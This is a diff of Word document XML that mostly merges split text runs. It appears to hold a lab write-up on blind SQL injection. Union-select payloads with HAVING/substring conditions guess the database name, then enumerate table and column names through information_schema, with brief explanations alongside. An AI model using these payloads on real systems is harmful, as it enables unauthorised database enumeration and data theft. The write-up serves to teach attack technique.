-      <w:bookmarkStart w:id="49" w:name="_Toc71451233"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc71453347"/>
       <w:bookmarkEnd w:id="48"/>
       <w:r>
         <w:rPr>
@@ -11888,27 +11272,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL --+</w:t>
+              <w:t>' union select NULL,NULL,NULL --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12046,27 +11410,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL having</w:t>
+              <w:t>' union select NULL,NULL,NULL having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12109,27 +11453,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12147,21 +11471,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>database(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>) correctly.</w:t>
+              <w:t>In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of database() correctly.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12476,20 +11786,12 @@
               </w:rPr>
               <w:t xml:space="preserve">the value of </w:t>
             </w:r>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>database(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>),</w:t>
+              <w:t>database(),</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12562,107 +11864,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12688,127 +11890,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(table_name,1,9)=BINARY 'Trainings' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'testing' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,9)=BINARY 'Trainings' and table_name&lt;&gt;'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12834,147 +11916,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(table_name,1,5)=BINARY 'Users' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">&lt;&gt;'testing' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'Trainings' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,5)=BINARY 'Users' and table_name&lt;&gt;'testing' and table_name&lt;&gt;'Trainings' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12999,21 +11941,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">n a), we do the same thing as step 2 to get the first table name of “Secure” from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>.</w:t>
+              <w:t>n a), we do the same thing as step 2 to get the first table name of “Secure” from information_schema.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13179,9 +12107,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13189,9 +12116,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>column_name</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13199,9 +12125,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13209,9 +12134,26 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:t>information_schema.columns where table_name='Users'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> having substr(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:t>column_name</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13219,9 +12161,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>,1,</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13229,9 +12170,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>3</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13239,9 +12179,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13249,94 +12188,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>='Users'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,1,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:t>api</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13369,147 +12222,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Users' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
